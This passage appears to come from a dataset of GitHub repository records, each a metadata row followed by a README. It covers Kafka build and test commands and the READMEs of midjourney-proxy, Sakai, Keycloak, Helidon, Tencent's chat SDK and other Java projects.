And you should see `INFO` level logs in the file under the `clients/build/test-results/test` directory.
### Specifying test retries ###
By default, each failed test is retried once up to a maximum of five retries per test run. Tests are retried at the end of the test task. Adjust these parameters in the following way:
./gradlew test -PmaxTestRetries=1 -PmaxTestRetryFailures=5
See [Test Retry Gradle Plugin](https://github.com/gradle/test-retry-gradle-plugin) for more details.
### Generating test coverage reports ###
Generate coverage reports for the whole project:
./gradlew reportCoverage -PenableTestCoverage=true -Dorg.gradle.parallel=false
Generate coverage for a single module, i.e.:
./gradlew clients:reportCoverage -PenableTestCoverage=true -Dorg.gradle.parallel=false
### Building a binary release gzipped tar ball ###
./gradlew clean releaseTarGz
The release file can be found inside `./core/build/distributions/`.
### Building auto generated messages ###
Sometimes it is only necessary to rebuild the RPC auto-generated message data when switching between branches, as they could
fail due to code changes. You can just run:
./gradlew processMessages processTestMessages
### Running a Kafka broker in KRaft mode
Using compiled files:
KAFKA_CLUSTER_ID=""$(./bin/kafka-storage.sh random-uuid)""
./bin/kafka-storage.sh format -t $KAFKA_CLUSTER_ID -c config/kraft/server.properties
./bin/kafka-server-start.sh config/kraft/server.properties
Using docker image:
docker run -p 9092:9092 apache/kafka:3.7.0
### Running a Kafka broker in ZooKeeper mode
Using compiled files:
./bin/zookeeper-server-start.sh config/zookeeper.properties
./bin/kafka-server-start.sh config/server.properties
>Since ZooKeeper mode is already deprecated and planned to be removed in Apache Kafka 4.0, the docker image only supports running in KRaft mode
### Cleaning the build ###
./gradlew clean
### Running a task with one of the Scala versions available (2.12.x or 2.13.x) ###
*Note that if building the jars with a version other than 2.13.x, you need to set the `SCALA_VERSION` variable or change it in `bin/kafka-run-class.sh` to run the quick start.*
You can pass either the major version (eg 2.12) or the full version (eg 2.12.7):
./gradlew -PscalaVersion=2.12 jar
./gradlew -PscalaVersion=2.12 test
./gradlew -PscalaVersion=2.12 releaseTarGz
### Running a task with all the scala versions enabled by default ###
Invoke the `gradlewAll` script followed by the task(s):
./gradlewAll test
./gradlewAll jar
./gradlewAll releaseTarGz
### Running a task for a specific project ###
This is for `core`, `examples` and `clients`
./gradlew core:jar
./gradlew core:test
Streams has multiple sub-projects, but you can run all the tests:
./gradlew :streams:testAll
### Listing all gradle tasks ###
./gradlew tasks
### Building IDE project ####
*Note that this is not strictly necessary (IntelliJ IDEA has good built-in support for Gradle projects, for example).*
./gradlew eclipse
./gradlew idea
The `eclipse` task has been configured to use `${project_dir}/build_eclipse` as Eclipse's build directory. Eclipse's default
build directory (`${project_dir}/bin`) clashes with Kafka's scripts directory and we don't use Gradle's build directory
to avoid known issues with this configuration.
### Publishing the jar for all versions of Scala and for all projects to maven ###
The recommended command is:
./gradlewAll publish
For backwards compatibility, the following also works:
./gradlewAll uploadArchives
Please note for this to work you should create/update `${GRADLE_USER_HOME}/gradle.properties` (typically, `~/.gradle/gradle.properties`) and assign the following variables
mavenUrl=
mavenUsername=
mavenPassword=
signing.keyId=
signing.password=
signing.secretKeyRingFile=
### Publishing the streams quickstart archetype artifact to maven ###
For the Streams archetype project, one cannot use gradle to upload to maven; instead the `mvn deploy` command needs to be called at the quickstart folder:
cd streams/quickstart
mvn deploy
Please note for this to work you should create/update user maven settings (typically, `${USER_HOME}/.m2/settings.xml`) to assign the following variables
...
...
apache.snapshots.https${maven_username}${maven_password}apache.releases.https${maven_username}${maven_password}
...
...
### Installing ALL the jars to the local Maven repository ###
The recommended command to build for both Scala 2.12 and 2.13 is:
./gradlewAll publishToMavenLocal
For backwards compatibility, the following also works:
./gradlewAll install
### Installing specific projects to the local Maven repository ###
./gradlew -PskipSigning=true :streams:publishToMavenLocal
If needed, you can specify the Scala version with `-PscalaVersion=2.13`.
### Building the test jar ###
./gradlew testJar
### Running code quality checks ###
There are two code quality analysis tools that we regularly run, spotbugs and checkstyle.
#### Checkstyle ####
Checkstyle enforces a consistent coding style in Kafka.
You can run checkstyle using:
./gradlew checkstyleMain checkstyleTest
The checkstyle warnings will be found in `reports/checkstyle/reports/main.html` and `reports/checkstyle/reports/test.html` files in the
subproject build directories. They are also printed to the console. The build will fail if Checkstyle fails.
#### Spotbugs ####
Spotbugs uses static analysis to look for bugs in the code.
You can run spotbugs using:
./gradlew spotbugsMain spotbugsTest -x test
The spotbugs warnings will be found in `reports/spotbugs/main.html` and `reports/spotbugs/test.html` files in the subproject build
directories. Use -PxmlSpotBugsReport=true to generate an XML report instead of an HTML one.
### JMH microbenchmarks ###
We use [JMH](https://openjdk.java.net/projects/code-tools/jmh/) to write microbenchmarks that produce reliable results in the JVM.
See [jmh-benchmarks/README.md](https://github.com/apache/kafka/blob/trunk/jmh-benchmarks/README.md) for details on how to run the microbenchmarks.
### Dependency Analysis ###
The gradle [dependency debugging documentation](https://docs.gradle.org/current/userguide/viewing_debugging_dependencies.html) mentions using the `dependencies` or `dependencyInsight` tasks to debug dependencies for the root project or individual subprojects.
Alternatively, use the `allDeps` or `allDepInsight` tasks for recursively iterating through all subprojects:
./gradlew allDeps
./gradlew allDepInsight --configuration runtimeClasspath --dependency com.fasterxml.jackson.core:jackson-databind
These take the same arguments as the builtin variants.
### Determining if any dependencies could be updated ###
./gradlew dependencyUpdates
### Common build options ###
The following options should be set with a `-P` switch, for example `./gradlew -PmaxParallelForks=1 test`.
* `commitId`: sets the build commit ID as .git/HEAD might not be correct if there are local commits added for build purposes.
* `mavenUrl`: sets the URL of the maven deployment repository (`file://path/to/repo` can be used to point to a local repository).
* `maxParallelForks`: maximum number of test processes to start in parallel. Defaults to the number of processors available to the JVM.
* `maxScalacThreads`: maximum number of worker threads for the scalac backend. Defaults to the lowest of `8` and the number of processors
available to the JVM. The value must be between 1 and 16 (inclusive).
* `ignoreFailures`: ignore test failures from junit
* `showStandardStreams`: shows standard out and standard error of the test JVM(s) on the console.
* `skipSigning`: skips signing of artifacts.
* `testLoggingEvents`: unit test events to be logged, separated by comma. For example `./gradlew -PtestLoggingEvents=started,passed,skipped,failed test`.
* `xmlSpotBugsReport`: enable XML reports for spotBugs. This also disables HTML reports as only one can be enabled at a time.
* `maxTestRetries`: maximum number of retries for a failing test case.
* `maxTestRetryFailures`: maximum number of test failures before retrying is disabled for subsequent tests.
* `enableTestCoverage`: enables test coverage plugins and tasks, including bytecode enhancement of classes required to track said
coverage. Note that this introduces some overhead when running tests and hence why it's disabled by default (the overhead
varies, but 15-20% is a reasonable estimate).
* `keepAliveMode`: configures the keep alive mode for the Gradle compilation daemon - reuse improves start-up time. The values should
be one of `daemon` or `session` (the default is `daemon`). `daemon` keeps the daemon alive until it's explicitly stopped while
`session` keeps it alive until the end of the build session. This currently only affects the Scala compiler, see
https://github.com/gradle/gradle/pull/21034 for a PR that attempts to do the same for the Java compiler.
* `scalaOptimizerMode`: configures the optimizing behavior of the scala compiler, the value should be one of `none`, `method`, `inline-kafka` or
`inline-scala` (the default is `inline-kafka`). `none` is the scala compiler default, which only eliminates unreachable code. `method` also
includes method-local optimizations. `inline-kafka` adds inlining of methods within the kafka packages. Finally, `inline-scala` also
includes inlining of methods within the scala library (which avoids lambda allocations for methods like `Option.exists`). `inline-scala` is
only safe if the Scala library version is the same at compile time and runtime. Since we cannot guarantee this for all cases (for example, users
may depend on the kafka jar for integration tests where they may include a scala library with a different version), we don't enable it by
default. See https://www.lightbend.com/blog/scala-inliner-optimizer for more details.
### Running system tests ###
See [tests/README.md](tests/README.md).
### Running in Vagrant ###
See [vagrant/README.md](vagrant/README.md).
### Contribution ###
Apache Kafka is interested in building the community; we would welcome any thoughts or [patches](https://issues.apache.org/jira/browse/KAFKA). You can reach us [on the Apache mailing lists](http://kafka.apache.org/contact.html).
To contribute follow the instructions here:
* https://kafka.apache.org/contributing.html
"
novicezk/midjourney-proxy,main,4185,2149,2023-04-24T13:43:45Z,5803,170,代理 MidJourney 的discord频道,实现api形式调用AI绘图,midjourney midjourney-api,"
midjourney-proxy
English | [中文](./README_CN.md)
Proxy the Discord channel for MidJourney to enable API-based calls for AI drawing
[![GitHub release](https://img.shields.io/static/v1?label=release&message=v2.6.1&color=blue)](https://www.github.com/novicezk/midjourney-proxy)
[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)
## Main Functions
- [x] Supports Imagine instructions and related actions
- [x] Supports adding image base64 as a placeholder when using the Imagine command
- [x] Supports Blend (image blending) and Describe (image to text) commands
- [x] Supports real-time progress tracking of tasks
- [x] Supports translation of Chinese prompts, requires configuration of Baidu Translate or GPT
- [x] Prompt sensitive word pre-detection, supports override adjustment
- [x] User-token connects to WSS (WebSocket Secure), allowing access to error messages and full functionality
- [x] Supports multi-account configuration, with each account able to set up corresponding task queues
**🚀 For more features, please refer to [midjourney-proxy-plus](https://github.com/litter-coder/midjourney-proxy-plus)**
> - [x] Supports all the features of the open-source version
> - [x] Supports Shorten (prompt analysis) command
> - [x] Supports focus shifting: Pan ⬅️ ➡️ ⬆️ ⬇️
> - [x] Supports image zooming: Zoom 🔍
> - [x] Supports local redrawing: Vary (Region) 🖌
> - [x] Supports nearly all associated button actions and the 🎛️ Remix mode
> - [x] Supports retrieving the seed value of images
> - [x] Account pool persistence, dynamic maintenance
> - [x] Supports retrieving account /info and /settings information
> - [x] Account settings configuration
> - [x] Supports Niji bot robot
> - [x] Supports InsightFace face replacement robot
> - [x] Embedded management dashboard page
## Prerequisites for use
1. Register and subscribe to MidJourney, create `your own server and channel`, refer
to https://docs.midjourney.com/docs/quick-start
2. Obtain user Token, server ID, channel ID: [Method of acquisition](./docs/discord-params.md)
## Quick Start
1. `Railway`: Based on the Railway platform, no need for your own server: [Deployment method](./docs/railway-start.md) ;
If Railway is not available, you can start using Zeabur instead.
2. `Zeabur`: Based on the Zeabur platform, no need for your own server: [Deployment method](./docs/zeabur-start.md)
3. `Docker`: Start using Docker on a server or locally: [Deployment method](./docs/docker-start.md)
## Local development
- Depends on Java 17 and Maven
- Change configuration items: Edit src/main/resources/application.yml
- Project execution: Start the main function of ProxyApplication
- After changing the code, build the image: Uncomment VOLUME in the Dockerfile, then
execute `docker build . -t midjourney-proxy`
## Configuration items
- mj.accounts: Refer
to [Account pool configuration](./docs/config.md#%E8%B4%A6%E5%8F%B7%E6%B1%A0%E9%85%8D%E7%BD%AE%E5%8F%82%E8%80%83)
- mj.task-store.type: Task storage method, default is in_memory (in memory, lost after restart), Redis is an alternative
option.
- mj.task-store.timeout: Task storage expiration time, tasks are deleted after expiration, default is 30 days.
- mj.api-secret: API key, if left empty, authentication is not enabled; when calling the API, you need to add the
request header 'mj-api-secret'.
- mj.translate-way: The method for translating Chinese prompts into English, options include null (default), Baidu, or
GPT.
- For more configuration options, see [Configuration items](./docs/config.md)
## Related documentation
1. [API Interface Description](./docs/api.md)
2. [Version Update Log](https://github.com/novicezk/midjourney-proxy/wiki/%E6%9B%B4%E6%96%B0%E8%AE%B0%E5%BD%95)
## Precautions
1. Frequent image generation and similar behaviors may trigger warnings on your Midjourney account. Please use with
caution.
2. For common issues and solutions, see [Wiki / FAQ](https://github.com/novicezk/midjourney-proxy/wiki/FAQ)
3. Interested friends are also welcome to join the discussion group. If the group is full from scanning the code, you
can add the administrator’s WeChat to be invited into the group. Please remark: mj join group.
## Application Project
If you have a project that depends on this one and is open source, feel free to contact the author to be added here for
display.
- [wechat-midjourney](https://github.com/novicezk/wechat-midjourney) : A proxy WeChat client that connects to
MidJourney, intended only as an example application scenario, will no longer be updated.
- [chatgpt-web-midjourney-proxy](https://github.com/Dooy/chatgpt-web-midjourney-proxy) : chatgpt web, midjourney,
gpts,tts, whisper A complete UI solution
- [chatnio](https://github.com/Deeptrain-Community/chatnio) : The next-generation AI one-stop solution for B/C end, an aggregated model platform with exquisite UI and powerful functions
- [new-api](https://github.com/Calcium-Ion/new-api) : An API interface management and distribution system compatible with the Midjourney Proxy
- [stable-diffusion-mobileui](https://github.com/yuanyuekeji/stable-diffusion-mobileui) : SDUI, based on this interface
and SD (System Design), can be packaged with one click to generate H5 and mini-programs.
- [MidJourney-Web](https://github.com/ConnectAI-E/MidJourney-Web) : 🍎 Supercharged Experience For MidJourney On Web UI
## Open API
Provides unofficial MJ/SD open API, add administrator WeChat for inquiries, please remark: api
## Others
If you find this project helpful, please consider giving it a star.
[![Star History Chart](https://api.star-history.com/svg?repos=novicezk/midjourney-proxy&type=Date)](https://star-history.com/#novicezk/midjourney-proxy&Date)
"
sakaiproject/sakai,master,1027,897,2014-12-29T11:14:17Z,509951,80,"Sakai is a freely available, feature-rich technology solution for learning, teaching, research and collaboration. Sakai is an open source software suite developed by a diverse and global adopter community.",education hacktoberfest java lms sakai sakai-cle tomcat vle,"# Sakai Collaboration and Learning Environment (Sakai CLE)
This is the source code for the Sakai CLE.
The master branch is the most current development release, Sakai 24.
The other branches are currently or previously supported releases. See below for more information on the release plan and support schedule.
## Building
[![Build Status](https://travis-ci.org/sakaiproject/sakai.svg?branch=master)](https://travis-ci.org/sakaiproject/sakai)
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/c68908d6bc044e95b453bae7ddcbad4a)](https://www.codacy.com/app/sakaiproject/sakai?utm_source=github.com&utm_medium=referral&utm_content=sakaiproject/sakai&utm_campaign=Badge_Grade)
This is the ""Mini Quick Start"" for more complete steps to get Sakai configured please look at [this guide on the wiki](https://github.com/sakaiproject/sakai/wiki/Quick-Start-from-Source).
To build Sakai you need Java 1.8. Once you have, clone a copy of this repository you can
build it by running (or `./mvnw install` if you don't have Maven installed):
```
mvn install
```
## Running
Sakai runs on Apache Tomcat 9. Download the latest version from http://tomcat.apache.org and extract the archive.
*Note: Sakai does not work with Tomcat installed via a package from apt-get, yum or other package managers.*
You **must** configure Tomcat according to the instructions on this page:
https://sakaiproject.atlassian.net/wiki/spaces/DOC/pages/17310646930/Sakai+21+Install+Guide+Source
When you are done, deploy Sakai to Tomcat:
```
mvn clean install sakai:deploy -Dmaven.tomcat.home=/path/to/your/tomcat
```
Now start Tomcat:
```
cd /path/to/your/tomcat/bin
./startup.sh && tail -f ../logs/catalina.out
```
Once Sakai has started up (it usually takes around 30 seconds), open your browser and navigate to http://localhost:8080/portal
## Licensing
Sakai is licensed under the [Educational Community License version 2.0](http://opensource.org/licenses/ECL-2.0)
Sakai is an [Apereo Foundation](http://www.apereo.org) project and follows the Foundation's guidelines and requirements for [Contributor License Agreements](https://www.apereo.org/licensing).
## Contributing
See [our dedicated page](CONTRIBUTING.md) for more information on contributing to Sakai.
## Bugs
For filing bugs against Sakai please use our Jira instance: https://jira.sakaiproject.org/
## Nightly servers
For testing out the latest builds go to the [nightly server page](http://nightly2.sakaiproject.org)
## Get in touch
If you have any questions, please join the Sakai developer mailing list: To subscribe send an email to sakai-dev+subscribe@apereo.org
To see a full list of Sakai email lists and other communication channels, please check out this Sakai wiki page:
https://confluence.sakaiproject.org/display/PMC/Sakai+email+lists
If you want more immediate response during M-F typical business hours you could try our Slack channels.
https://apereo.slack.com/signup
If you can't find your ""at institution.edu"" on the Apereo signup page then send an email requesting access for yourself and your institution either to sakai-qa-planners@apereo.org or sakaicoordinator@apereo.org.
## Community supported versions
These versions are actively supported by the community.
Sakai 23.1 ([release](http://source.sakaiproject.org/release/23.1/) | [fixes](https://confluence.sakaiproject.org/display/DOC/23.1+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+23+Release+Notes))
Sakai 22.4 ([release](http://source.sakaiproject.org/release/22.4/) | [fixes](https://confluence.sakaiproject.org/display/DOC/22.4+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+22+Release+Notes))
## Previous community versions which are no longer supported
These versions are no longer supported by the community and will only receive security changes.
Sakai 21.5 ([release](http://source.sakaiproject.org/release/21.5/) | [fixes](https://confluence.sakaiproject.org/display/DOC/21.5+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+21+Release+Notes))
Sakai 20.6 ([release](http://source.sakaiproject.org/release/20.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/20.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+20+Release+Notes))
Sakai 19.6 ([release](http://source.sakaiproject.org/release/19.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/19.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+19+Release+Notes))
Sakai 12.7 ([release](http://source.sakaiproject.org/release/12.7/) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+12+Release+Notes))
Sakai 11.4 ([release](http://source.sakaiproject.org/release/11.4/))
For full history of supported releases please see our [release information on confluence](https://confluence.sakaiproject.org/display/DOC/Sakai+Release+Date+list).
## Under Development
[Sakai 23.2](https://confluence.sakaiproject.org/display/REL/Sakai+23+Straw+person) is the current development release of Sakai 23. It is expected to release Q2 2024.
[Sakai 22.5](https://confluence.sakaiproject.org/display/REL/Sakai+22+Straw+person) is the current development release of Sakai 22. It is expected to release Q2 2024.
## Accessibility
[The Sakai Accessibility Working Group](https://confluence.sakaiproject.org/display/2ACC/Accessibility+Working+Group) is responsible for ensuring that the Sakai framework and its tools are accessible to persons with disabilities. [The Sakai Ra11y plan](https://confluence.sakaiproject.org/display/2ACC/rA11y+Plan) is working towards a VPAT and/or a WCAG2 certification.
CKSource has created a GPL licensed open source version of their [Accessibility Checker](https://cksource.com/ckeditor/services#accessibility-checker) that lets you inspect the accessibility level of content created in CKEditor and immediately solve any accessibility issues that are found. CKEditor is the open source rich text editor used throughout Sakai. While the Accessibility Checker, due to the GPL license, can not be bundled with Sakai, it can be used with Sakai and the A11y group has created [instructions](https://confluence.sakaiproject.org/display/2ACC/CKEditor+Accessibility+Checker) to help you.
## Skinning Sakai
Documentation on how to alter the Sakai skin (look and feel) is here https://github.com/sakaiproject/sakai/tree/master/library
## Translating Sakai
Translation, internationalization and localization of the Sakai project are coordinated by the Sakai Internationalization/localization community. This community maintains a publicly-accessible report that tracks what percentage of Sakai has been translated into various global languages and dialects. If the software is not yet available in your language, you can translate it with support from the broader Sakai Community to assist you.
From its inception, the Sakai project has been envisioned and designed for global use. Complete or majority-complete translations of Sakai are available in the languages listed below.
### Supported languages
| Locale | Language|
| ------ | ------ |
| en_US | English (Default) |
| ca_ES | Catalán |
| de_DE | German |
| es_ES | Español |
| eu | Euskera |
| fa_IR | Farsi |
| fr_FR | Français |
| hi_IN | Hindi |
| ja_JP | Japanese |
| mn | Mongolian |
| pt_BR | Portuguese (Brazil) |
| sv_SE | Swedish |
| tr_TR | Turkish |
| zh_CN | Chinese |
| ar | Arabic |
| ro_RO | Romanian |
| bg | Bulgarian |
| sr | Serbian |
### Other languages
Other languages have been declared legacy in Sakai 19 and have been moved to [Sakai Contrib as language packs](https://github.com/sakaicontrib/legacy-language-packs).
## Community (contrib) tools
A number of institutions have written additional tools for Sakai that they use in their local installations, but are not yet in an official release of Sakai. These are being collected at https://github.com/sakaicontrib where you will find information about each one. You might find just the thing you are after!
"
keycloak/keycloak,main,19774,6232,2013-07-02T13:38:51Z,497513,1964,Open Source Identity and Access Management For Modern Applications and Services,keycloak oidc saml,"![Keycloak](https://github.com/keycloak/keycloak-misc/blob/main/logo/logo.svg)
![GitHub Release](https://img.shields.io/github/v/release/keycloak/keycloak?label=latest%20release)
[![OpenSSF Best Practices](https://bestpractices.coreinfrastructure.org/projects/6818/badge)](https://bestpractices.coreinfrastructure.org/projects/6818)
![GitHub Repo stars](https://img.shields.io/github/stars/keycloak/keycloak?style=flat)
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/keycloak/keycloak)
# Open Source Identity and Access Management
Add authentication to applications and secure services with minimum effort. No need to deal with storing users or authenticating users.
Keycloak provides user federation, strong authentication, user management, fine-grained authorization, and more.
## Help and Documentation
* [Documentation](https://www.keycloak.org/documentation.html)
* [User Mailing List](https://groups.google.com/d/forum/keycloak-user) - Mailing list for help and general questions about Keycloak
## Reporting Security Vulnerabilities
If you have found a security vulnerability, please look at the [instructions on how to properly report it](https://github.com/keycloak/keycloak/security/policy).
## Reporting an issue
If you believe you have discovered a defect in Keycloak, please open [an issue](https://github.com/keycloak/keycloak/issues).
Please remember to provide a good summary, description as well as steps to reproduce the issue.
## Getting started
To run Keycloak, download the distribution from our [website](https://www.keycloak.org/downloads.html). Unzip and run:
bin/kc.[sh|bat] start-dev
Alternatively, you can use the Docker image by running:
docker run quay.io/keycloak/keycloak start-dev
For more details refer to the [Keycloak Documentation](https://www.keycloak.org/documentation.html).
## Building from Source
To build from source, refer to the [building and working with the code base](docs/building.md) guide.
### Testing
To run tests, refer to the [running tests](docs/tests.md) guide.
### Writing Tests
To write tests, refer to the [writing tests](docs/tests-development.md) guide.
## Contributing
Before contributing to Keycloak, please read our [contributing guidelines](CONTRIBUTING.md). Participation in the Keycloak project is governed by the [CNCF Code of Conduct](https://github.com/cncf/foundation/blob/main/code-of-conduct.md).
## Other Keycloak Projects
* [Keycloak](https://github.com/keycloak/keycloak) - Keycloak Server and Java adapters
* [Keycloak QuickStarts](https://github.com/keycloak/keycloak-quickstarts) - QuickStarts for getting started with Keycloak
* [Keycloak Node.js Connect](https://github.com/keycloak/keycloak-nodejs-connect) - Node.js adapter for Keycloak
## License
* [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0)
"
TheAlgorithms/Java,master,56600,18522,2016-07-16T10:21:02Z,3975,5,All Algorithms implemented in Java,algorithm algorithm-challenges algorithms algorithms-datastructures data-structures hacktoberfest java search sort sorting-algorithms,"# The Algorithms - Java
[![Build](https://github.com/TheAlgorithms/Java/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/TheAlgorithms/Java/actions/workflows/build.yml)
[![codecov](https://codecov.io/gh/TheAlgorithms/Java/graph/badge.svg?token=XAdPyqTIqR)](https://codecov.io/gh/TheAlgorithms/Java)
[![Discord chat](https://img.shields.io/discord/808045925556682782.svg?logo=discord&colorB=7289DA&style=flat-square)](https://discord.gg/c7MnfGFGa6)
[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/TheAlgorithms/Java)
You can run and edit the algorithms, or contribute to them using Gitpod.io (a free online development environment) with a single click.
[![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/TheAlgorithms/Java)
### All algorithms are implemented in Java (for educational purposes)
These implementations are intended for learning purposes. As such, they may be less efficient than the Java standard library.
## Contribution Guidelines
Please read our [Contribution Guidelines](CONTRIBUTING.md) before you contribute to this project.
## Algorithms
Our [directory](DIRECTORY.md) has the full list of applications.
"
TencentCloud/TIMSDK,master,2518,2766,2019-01-17T07:35:20Z,877413,364,"Tencent Cloud Chat features a comprehensive suite of solutions including global access, one-to-one chat, group chat, message push, profile and relationship chain hosting, and account authentication. ",,"English | [简体中文](./README_ZH.md)
Notice: If you open a pull request in TUIKit Android or iOS and the corresponding changes are successfully merged, your name will be included in README.md with a hyperlink to your homepage on GitHub.
# Instant Messaging
## Product Introduction
Build real-time social messaging capabilities with all the features into your applications and websites based on powerful and feature-rich chat APIs, SDKs and UIKit components.
Android Experience App
iOS Experience App
TUIKit is a UI component library based on Tencent Cloud IM SDK. It provides universal UI components to offer features such as conversation, chat, search, relationship chain, group, and audio/video call features.
## Image Download
Tencent Cloud branch download address: [Download](https://im.sdk.qcloud.com/download/github/TIMSDK.zip)
## SDK Download
## Guidelines for Upgrading IMSDK to V2 APIs
[API Upgrade Guidelines](https://docs.qq.com/sheet/DS3lMdHpoRmpWSEFW)
## Latest Enhanced Version 7.9.5666 @2024.04.07
### SDK
- New visionOS SDK, compatible with Apple Vision Pro
- Group conversation supports message pinning
- Add the function of receiving group @ reminder offline notifications during Do Not Disturb mode
- Support setting friend remarks in the ""Accept Friend Request"" interface
- Add handling of invitations to join groups
- Upgrade vivo push package version in TIMPush
- Fix OV device crash issue in TIMPush
- Add OfflinePushExtInfo support for push through feature in TIMPush
- Fix the issue of not receiving the notification of being kicked out due to network disconnection
- Fix the issue of occasionally not receiving group messages when joining a live group immediately in the login callback
- Fix the issue of still receiving session change callbacks after receiving the delete session callback
- Fix the issue of occasional reset of local data in messages
- Fix the issue of frequent triggering of onRecvMessageModified callback when fetching historical messages
- Fix the issue of no return value and no support for optional values in some Swift interfaces
- Fix the multi-endpoint login exception caused by iCloud sync between different types of devices with the same AppleID
- Fix related issues of communities and topics
- Fix the issue of failing to fetch historical messages on HarmonyOS platform
- Upgrade libcurl in Windows platform to 8.4.0
- Fix the issue of duplicate summary in merged forwarded messages in C++ interface
- Fix the issue of unable to download large images in C++ interface
- Fix the issue of incorrect group type in C++ interface
- Fix the issue of unable to set message custom data in C++ interface
- Fix the forwarding message failure in C++ interface
### TUIKit & Demo
- iOS components provide PrivacyInfo.xcprivacy privacy list file
- TUIChatBot plugin supports markdown text display
- TUIChat chat page header supports displaying call status
"
helidon-io/helidon,main,3387,551,2018-08-27T11:03:52Z,94032,550,Java libraries for writing microservices,java microprofile microservice-framework netty reactive,"
# Helidon: Java Libraries for Microservices
Project Helidon is a set of Java Libraries for writing microservices.
Helidon supports two programming models:
* Helidon MP: [MicroProfile 6.0](https://github.com/eclipse/microprofile/releases/tag/6.0)
* Helidon SE: a small, functional style API
In either case your application is a Java SE program running on the
new Helidon Níma WebServer that has been written from the ground up to
use Java 21 Virtual Threads. With Helidon 4 you get the high throughput of a reactive server with the simplicity of thread-per-request style programming.
The Helidon SE API in Helidon 4 has changed significantly from Helidon 3. The use of virtual threads has enabled these APIs to change from asynchronous to blocking. This results in much simpler code that is easier to write, maintain, debug and understand. Earlier Helidon SE code will require modification to run on these new APIs. For more information see the [Helidon SE Upgrade Guide](https://helidon.io/docs/v4/#/se/guides/upgrade_4x).
Helidon 4 supports MicroProfile 6. This means your existing Helidon MP 3.x applications will run on Helidon 4 with only minor modifications. And since Helidon’s MicroProfile server is based on the new Níma WebServer you get all the benefits of running on virtual threads. For more information see the [Helidon MP Upgrade Guide](https://helidon.io/docs/v4/#/mp/guides/upgrade_4x).
New to Helidon? Then jump in and [get started](https://helidon.io/docs/v4/#/about/prerequisites).
Java 21 is required to use Helidon 4.
## License
Helidon is available under Apache License 2.0.
## Documentation
Latest documentation and javadocs are available at .
Helidon White Paper is available [here](https://www.oracle.com/a/ocom/docs/technical-brief--helidon-report.pdf).
## Get Started
See Getting Started at .
## Downloads / Accessing Binaries
There are no Helidon downloads. Just use our Maven releases (GroupID `io.helidon`).
See Getting Started at .
## Helidon CLI
macOS:
```bash
curl -O https://helidon.io/cli/latest/darwin/helidon
chmod +x ./helidon
sudo mv ./helidon /usr/local/bin/
```
Linux:
```bash
curl -O https://helidon.io/cli/latest/linux/helidon
chmod +x ./helidon
sudo mv ./helidon /usr/local/bin/
```
Windows:
```bat
PowerShell -Command Invoke-WebRequest -Uri ""https://helidon.io/cli/latest/windows/helidon.exe"" -OutFile ""C:\Windows\system32\helidon.exe""
```
See this [document](HELIDON-CLI.md) for more info.
## Build
You need JDK 21 to build Helidon 4.
You also need Maven. We recommend 3.8.0 or newer.
**Full build**
```bash
$ mvn install
```
**Checkstyle**
```bash
# cd to the component you want to check
$ mvn validate -Pcheckstyle
```
**Copyright**
```bash
# cd to the component you want to check
$ mvn validate -Pcopyright
```
**Spotbugs**
```bash
# cd to the component you want to check
$ mvn verify -Pspotbugs
```
**Documentatonn**
```bash
# At the root of the project
$ mvn site
```
**Build Scripts**
Build scripts are located in `etc/scripts`. These are primarily used by our pipeline,
but a couple are handy to use on your desktop to verify your changes.
* `copyright.sh`: Run a full copyright check
* `checkstyle.sh`: Run a full style check
## Get Help
* See the [Helidon FAQ](https://github.com/oracle/helidon/wiki/FAQ)
* Ask questions on Stack Overflow using the [helidon tag](https://stackoverflow.com/tags/helidon)
* Join us on Slack: [#helidon-users](http://slack.helidon.io)
## Get Involved
* Learn how to [contribute](CONTRIBUTING.md)
* See [issues](https://github.com/oracle/helidon/issues) for issues you can help with
## Stay Informed
* Twitter: [@helidon_project](https://twitter.com/helidon_project)
* Blog: [Helidon on Medium](https://medium.com/helidon)
"
elastic/elasticsearch,main,67512,24082,2010-02-08T13:20:56Z,1182385,4736,"Free and Open, Distributed, RESTful Search Engine",elasticsearch java search-engine,
HelloWorld521/Java,master,2998,1422,2016-12-08T14:01:46Z,28772,63,java项目实战练习,java,"# Java
##### [中文](README_ZH.md)
## Project Descriptions
Below here are some of my java project exercise codes, I would like to share it with everyone, hope that we are able to improve with everyone!
## Java Projects
* [swagger2-boot-starter](https://github.com/HelloWorld521/swagger2-boot-starter)
* [SpringBoot-Shiro](./springboot-shiro/)
* [SECKILL](./seckill/)
* [Woss2.0 ](./woss/)
* [tomcatServlet3.0 Web Server](./tomcatServer3.0/)
* [ServletAjax ](./ServletAjax/)
* [JspChat jsp Chatroom](./JspChat/)
* [eStore library system](./estore/)
* [checkcode Java captcha code generator](./checkcode/)
* [IMOOCSpider easy internet spider](./IMOOCSpider/)
## Last
If any of the projects above is able to help you out, please do click on ""Star"" on top right-hand-site. Thank you!
"
apache/skywalking,master,23239,6422,2015-11-07T03:30:36Z,170097,58,"APM, Application Performance Monitoring System",apm dapper distributed-tracing ebpf logging metrics observability open-telemetry prometheus service-mesh skywalking telegraf web-performance zabbix,"Apache SkyWalking
==========
**SkyWalking**: an APM (Application Performance Monitoring) system, especially designed for
microservices, cloud native and container-based architectures.
[![GitHub stars](https://img.shields.io/github/stars/apache/skywalking.svg?style=for-the-badge&label=Stars&logo=github)](https://github.com/apache/skywalking)
[![Twitter Follow](https://img.shields.io/twitter/follow/asfskywalking.svg?style=for-the-badge&label=Follow&logo=twitter)](https://twitter.com/AsfSkyWalking)
